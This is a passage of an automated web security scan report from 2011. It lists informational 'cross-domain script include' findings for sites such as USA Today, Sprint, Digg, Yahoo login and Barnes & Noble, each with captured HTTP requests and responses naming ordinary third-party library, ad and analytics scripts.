User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:16 GMT
Server: Apache
MIME-Version: 1.0
Content-Length: 15034
Vary: Accept-Encoding
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

           <title>O
...[SNIP]...
<meta http-equiv="expires" content="mon, 22 jul 2002 11:12:01 gmt" />


       <script src="http://d2acq6zvr4qvep.cloudfront.net/library/47B8B7F11188014BC6OqLI9C3DA1/assets/jstext.global.20110829151635.js" type="text/javascript"></script>
<script type="text/javascript" src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jquery/v1.3.2/jquery-1.3.2.min.js"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/combined_1314384833.min.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jquerycaret/jcaret.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/lazyload-min.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/json2.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/privateparty_1313193312.min.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/loadselect_1313193312.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jqueryui/v1.7.2/jquery-ui-1.7.2.custom.min.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jqueryqueue/v1.0/ajaxqueue.1.0.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jqueryscrollto/v1.4.2/jquery.scrollTo.1.4.2.min.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jquerytools/v1.2.2/jquery.tools.min.js" type="text/javascript"></script>
...[SNIP]...
<link href="http://www.charlotteobserver.com/static/styles/vendor/vendor_ap/headerTemplate.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="http://media.charlotteobserver.com/mistats/sites/clt/charlotteobserver.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://media.charlotteobserver.com/mistats/vendors/adperfect_s_code.js"></script>
<script type="text/javascript" src="http://media.charlotteobserver.com/mistats/vendors/adperfect.js"></script>
<script type="text/javascript" src="http://media.charlotteobserver.com/mistats/finalizestats.js"></script>
...[SNIP]...

21.4. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:13 GMT
Content-Length: 48884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicationServer" xmlns:o
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

21.5. http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://delivery.sprint.com
Path:	/m/p/nxt/reg/cmb/generic.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery-1.3.2.min.js
http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery.ifixpng.js
http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery.radio_btn.js
http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery.validate-1.5.5.min.js
http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/sprintHFFunctions.js
http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/userLIB.js

Request

GET /m/p/nxt/reg/cmb/generic.asp HTTP/1.1
Host: delivery.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:22:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9338
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:22:23 GMT
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML XMLNS="http://www.w3.org/1999/xhtml">
   <HEAD>
    <META HTTP-E
...[SNIP]...

       <SCRIPT TYPE="text/javascript" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery-1.3.2.min.js"></SCRIPT>
       <SCRIPT TYPE="text/javascript" CHARSET="utf-8" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery.radio_btn.js" ></SCRIPT>
       <SCRIPT TYPE="text/javascript" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery.ifixpng.js"></SCRIPT>

       
   <SCRIPT TYPE="text/javascript" CHARSET="utf-8" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery.validate-1.5.5.min.js"></SCRIPT>

       
       <SCRIPT TYPE="text/javascript" CHARSET="utf-8" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/sprintHFFunctions.js"></SCRIPT>
       <SCRIPT TYPE="text/javascript" CHARSET="utf-8" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/userLIB.js"></SCRIPT>
...[SNIP]...

21.6. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/two_column/lib.655e7d5e.js
http://cdn4.diggstatic.com/js/two_column/common/fb_loader.7fbbdd84.js

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26937 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</div>

<script src="http://cdn4.diggstatic.com/js/two_column/common/fb_loader.7fbbdd84.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.655e7d5e.js" type="text/javascript"></script>
...[SNIP]...

21.7. http://grfx.cstv.com/scripts/oas-omni-controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://grfx.cstv.com
Path:	/scripts/oas-omni-controls.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-sports.js
http://ocp.ncaa.com/adFunctions.js?site=188

Request

GET /scripts/oas-omni-controls.js HTTP/1.1
Host: grfx.cstv.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "3912956150"
Last-Modified: Wed, 26 Jan 2011 17:07:09 GMT
Content-Length: 10053
Server: lighttpd
Date: Sun, 04 Sep 2011 00:42:36 GMT
Connection: close

/*
created by david parnell
copyright College Sports Online, Inc.
no part of this application may be used, duplicated or accessed without permission
*/
var NS4 = (document.layers) ? true : false;
var
...[SNIP]...
</script>');
// now calls http://grfx.cstv.com/scripts/mantaray.js from ncaa/library/scripts/cookieCheck.js for Madison for NCAA
//document.writeln('<script language="javascript" src="http://ocp.ncaa.com/adFunctions.js?site=188"></script>');
//document.writeln('<script language="javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-sports.js"></script>
...[SNIP]...

21.8. http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/us/app/the-sacramento-bee-for-ipad/id446757012

Issue detail

The response dynamically includes the following scripts from other domains:

http://r.mzstatic.com/htmlResources/8506/web-storefront-base.jsz
http://r.mzstatic.com/htmlResources/8506/web-storefront-preview.jsz

Request

GET /us/app/the-sacramento-bee-for-ipad/id446757012 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 04 Sep 2011 01:22:45 GMT
x-apple-orig-url-path: /us/app/the-sacramento-bee-for-ipad/id446757012
x-apple-application-site: ST11
x-apple-max-age: 3600
x-apple-aka-ttl: Generated Sat Sep 03 18:22:45 PDT 2011, Expires Sat Sep 03 18:23:45 PDT 2011, TTL 60s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=446757012&cc=us
x-apple-application-instance: 2011002
Content-Type: text/html; charset=UTF-8
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=55
Date: Sun, 04 Sep 2011 01:22:45 GMT
Content-Length: 27908
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">

<head>
<script>
if (!window.its) window.it
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/8506/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/8506/web-storefront-preview.jsz"></script>
...[SNIP]...

21.9. https://login.yahoo.com/config/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.yahoo.com
Path:	/config/login

Issue detail

The response dynamically includes the following script from another domain:

https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49854

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</script>
<script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script>
...[SNIP]...

21.10. http://notredame-hospitality.cbscollegestore.com/store.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://notredame-hospitality.cbscollegestore.com
Path:	/store.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://dw.com.com/js/dw.js
http://secure-us.imrworldwide.com/v53.js

Request

GET /store.cfm HTTP/1.1
Host: notredame-hospitality.cbscollegestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:30 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45806

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script typ
...[SNIP]...

<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

21.11. https://observ.subscribeobserver.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://observ.subscribeobserver.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://media.charlotteobserver.com/misites/clt/charlotte.js
http://media.charlotteobserver.com/mistats/finalizestats.js
http://media.charlotteobserver.com/mistats/products/pubsys.js
http://media.charlotteobserver.com/mistats/products/pubsys_s_code.js

Request

GET / HTTP/1.1
Host: observ.subscribeobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:25:42 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Circulation - CharlotteObserver.com</title>
<link href="h
...[SNIP]...
<link href="http://www.charlotteobserver.com/static/styles/vendor/vendor_cu/vendor.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="http://media.charlotteobserver.com/misites/clt/charlotte.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://media.charlotteobserver.com/mistats/products/pubsys_s_code.js"></script>
<script language="JavaScript" type="text/javascript" src="http://media.charlotteobserver.com/mistats/products/pubsys.js"></script>

<script language="JavaScript" type="text/javascript" src="http://media.charlotteobserver.com/mistats/finalizestats.js"></script>
...[SNIP]...

21.12. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-2.html

Issue detail

The response dynamically includes the following script from another domain:

http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=26912083&ahcid=2168938&bimpd=1q9TIpCmi1EdJohtUWz0lJ5a-pSOMHS7Ezy2FjI_vHrXiq8hAV11XPhafQktepoS-8rqguAbcgm8jBc_ypDM6L8wvAhJVp5vH1605NNaPKgd1x29xXl5OSgnSbh900QIWnzm0g3dvqzmL8voAmXoTtff2qOd8TAuM1o70SLAMfwCKpFmO4iIlB0kM7YKTICsShd3uegFPM5xOANTmG-u1JbI3CqAW-xcD_QEe386RDj1xjwbsNZFsKJut-wOE8nAr9YVatunbiAZAqr48mcZONXeRnQwv4vmdjbWA-GfKq4ICbnFGLtQD8yP_S3oZsbK1W6wp1bOqfXjFaREiyr2WhbN_AQhQZWpugTa6X6c9ek5k32s-ADSHzfLME1qSH4I3WNdkcYt41xnLj02NCh6z6yV5S_s7CGYbkSuSOV1dy9riB2_lRUwHmgNnVv8Z-1EhLfWSwI4w4uw-MZpH7nR0Kxj9pvyOlPugZWDlzNTme1-NVogyIlbI1Q083pFcjlLTx0P-h_rWTkucJCGcQUSz8gNA148HlKYlS27VQ0aTwrTT_eA52mCatOncnLvglOXvfBz5xDsVEqchMpjM7fNhftKFt6mtwILgy-yM2mplJKlL1R5lnQi8njXSm7iSWQul0ohXxHabAlqpPokL6-2DLPbXvgXG5G_iJyiuYeWEQiDv87ryg5KhVVUmj_2IN_QHgSyrc-_WNzPiO_kdyWr_fJlNR2L2B8S2Z2dnFHKHzGjsZQyAQ6kVAwWSib4A4xDZrbyk0__ntU9XzUlV3N0ao9MuA-hZzGxRdI_-VJWChwqntp-8j38wEd1ezH0LZQcf4VYLVvzEzWX5ctvkm4Uz30lpriMl-1v60tkD4B8fShZA5xP-LKOGfmI9Q4im5wVCalT7hKQiqHP8W7OqEJPgwNKEhESwEDwDinJfsY1PlXw0sAoKrQANkKorThvVW5_&acp=F2A40808BF222937&rtbacid=3ac1d9216377d94e63eb63894d8f45c94029a655

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4462/5032; rdk15=0; ses15=5032^1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:17 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112482; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2173

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script src='http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=26912083&ahcid=2168938&bimpd=1q9TIpCmi1EdJohtUWz0lJ5a-pSOMHS7Ezy2FjI_vHrXiq8hAV11XPhafQktepoS-8rqguAbcgm8jBc_ypDM6L8wvAhJVp5vH1605NNaPKgd1x29xXl5OSgnSbh900QIWnzm0g3dvqzmL8voAmXoTtff2qOd8TAuM1o70SLAMfwCKpFmO4iIlB0kM7YKTICsShd3uegFPM5xOANTmG-u1JbI3CqAW-xcD_QEe386RDj1xjwbsNZFsKJut-wOE8nAr9YVatunbiAZAqr48mcZONXeRnQwv4vmdjbWA-GfKq4ICbnFGLtQD8yP_S3oZsbK1W6wp1bOqfXjFaREiyr2WhbN_AQhQZWpugTa6X6c9ek5k32s-ADSHzfLME1qSH4I3WNdkcYt41xnLj02NCh6z6yV5S_s7CGYbkSuSOV1dy9riB2_lRUwHmgNnVv8Z-1EhLfWSwI4w4uw-MZpH7nR0Kxj9pvyOlPugZWDlzNTme1-NVogyIlbI1Q083pFcjlLTx0P-h_rWTkucJCGcQUSz8gNA148HlKYlS27VQ0aTwrTT_eA52mCatOncnLvglOXvfBz5xDsVEqchMpjM7fNhftKFt6mtwILgy-yM2mplJKlL1R5lnQi8njXSm7iSWQul0ohXxHabAlqpPokL6-2DLPbXvgXG5G_iJyiuYeWEQiDv87ryg5KhVVUmj_2IN_QHgSyrc-_WNzPiO_kdyWr_fJlNR2L2B8S2Z2dnFHKHzGjsZQyAQ6kVAwWSib4A4xDZrbyk0__ntU9XzUlV3N0ao9MuA-hZzGxRdI_-VJWChwqntp-8j38wEd1ezH0LZQcf4VYLVvzEzWX5ctvkm4Uz30lpriMl-1v60tkD4B8fShZA5xP-LKOGfmI9Q4im5wVCalT7hKQiqHP8W7OqEJPgwNKEhESwEDwDinJfsY1PlXw0sAoKrQANkKorThvVW5_&acp=F2A40808BF222937&rtbacid=3ac1d9216377d94e63eb63894d8f45c94029a655'></script>
...[SNIP]...

21.13. http://s3.cinesport.com/app_v2/csprt_player.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s3.cinesport.com
Path:	/app_v2/csprt_player.js

Issue detail

The response dynamically includes the following script from another domain:

http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /app_v2/csprt_player.js HTTP/1.1
Host: s3.cinesport.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/players/charlotteobservergeneric.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-322959065-1315097103938

Response

HTTP/1.1 200 OK
x-amz-id-2: 7N8AR+V6H3fSQl9HTVH58l2vV4izrizvgmS/bK9Ow2cnmcwf6T0oDEAxSvB/aMrS
x-amz-request-id: 848CBB4F41C7E116
Date: Sun, 04 Sep 2011 00:44:27 GMT
Last-Modified: Fri, 08 Jul 2011 17:46:03 GMT
ETag: "4576309e2337649c8338206a0f56140b"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 13798
Server: AmazonS3

       var playerLoop;
       var contextualTag;
       var bcExp;
       var modAd;
       var displayAdPresent = false;
       var adslot_300x60;
       var adslot_300x250;
       var bgcolor = '#666666';
       var fgcolor = '#ffffff';
       var
...[SNIP]...
</div><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

21.14. http://s3.cinesport.com/players/charlotteobservergeneric.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s3.cinesport.com
Path:	/players/charlotteobservergeneric.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /players/charlotteobservergeneric.html HTTP/1.1
Host: s3.cinesport.com
Proxy-Connection: keep-alive
Referer: http://cdn.cinesport.com/container.html?id=charlotteobservergeneric
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: 1Nr266wXC7EHsvmxpWWcHS3AhMNbX8MZOTe62e6yFQbTYtssS6ug80EYLTQf1Vt/
x-amz-request-id: 4C5A99403DE6AC76
Date: Sun, 04 Sep 2011 01:03:56 GMT
x-amz-meta-s3fox-filesize: 2239
x-amz-meta-s3fox-modifiedtime: 1311796338000
Last-Modified: Wed, 27 Jul 2011 19:52:37 GMT
ETag: "f68aa828ce98884963501e8c0b7a6dd3"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 2239
Server: AmazonS3

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
       <title>Container<
...[SNIP]...
<link rel="stylesheet" href="http://s3.cinesport.com/app_v2/player.css" type="text/css"/>
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
   </script>
...[SNIP]...

21.15. http://sacramentoconnect.sacbee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sacramentoconnect.sacbee.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://e.yieldmanager.net/script.js
http://widgets.twimg.com/j/2/widget.js

Request

GET / HTTP/1.1
Host: sacramentoconnect.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:34 GMT
Server: Apache/2.2.16 (Amazon)
Last-Modified: Sun, 04 Sep 2011 00:43:30 GMT
ETag: "16daf-4ac12e2205080"
Accept-Ranges: bytes
Content-Length: 93615
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Sun, 04 Sep 2011 01:43:30 GMT
Vary: Accept-Encoding,Cookie
X-Pingback: http://sacramentoconnect.sacbee.com/wordpress/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.2.3
Pragma: public
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>

<script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
<br /><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

21.16. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.barnesandnoble.com
Path:	/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Issue detail

The response dynamically includes the following scripts from other domains:

http://img1.imagesbn.com/pace/js/core/core.js
http://img1.imagesbn.com/pace/js/externro/jquery-1.4.2.min.js
http://img1.imagesbn.com/pace/js/externro/jquery.tools.min.js
http://img1.imagesbn.com/pimages/iframe/iframeKMP.js
http://img1.imagesbn.com/pimages/js/bn_analytics.js
http://img1.imagesbn.com/pimages/js/bnnav.js
http://img1.imagesbn.com/pimages/js/imgviewer.js
http://img1.imagesbn.com/pimages/js/modPop.js
http://img1.imagesbn.com/pimages/js/productpreview.js
http://img1.imagesbn.com/presources/community/js/jquery-latest.js
http://img1.imagesbn.com/presources/community/js/reviews.js
http://img1.imagesbn.com/presources/community/js/share_this_page.js
http://img1.imagesbn.com/presources/community/js/ui.js
http://img1.imagesbn.com/presources/global/js/bn-global.js
http://img1.imagesbn.com/presources/global/js/bn.nav.js
http://img1.imagesbn.com/presources/global/js/bn.ui.js
http://img1.imagesbn.com/presources/global/js/jquery/plugins/jquery.hoverintent.js
http://img1.imagesbn.com/presources/js/bnNavEvents.js
http://img1.imagesbn.com/presources/js/bnautosuggest.js
http://img1.imagesbn.com/presources/js/dropdownbn07.js
http://img1.imagesbn.com/presources/js/formbn07.js
http://img1.imagesbn.com/presources/js/signin.js
http://img1.imagesbn.com/presources/js/visualcart_prodid.js
http://img1.imagesbn.com/presources/js/webservice-core_v2.js
http://img1.imagesbn.com/presources/product/js/jquerypdp07.js
http://img1.imagesbn.com/presources/product/js/productPage.js

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
P3P: CP="CAO DSP COR ADM DEV TAI PSA IVDo CONo HIS TELo DEL SAMo UNRo LEG PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 122283
Date: Sun, 04 Sep 2011 01:23:43 GMT
Connection: close
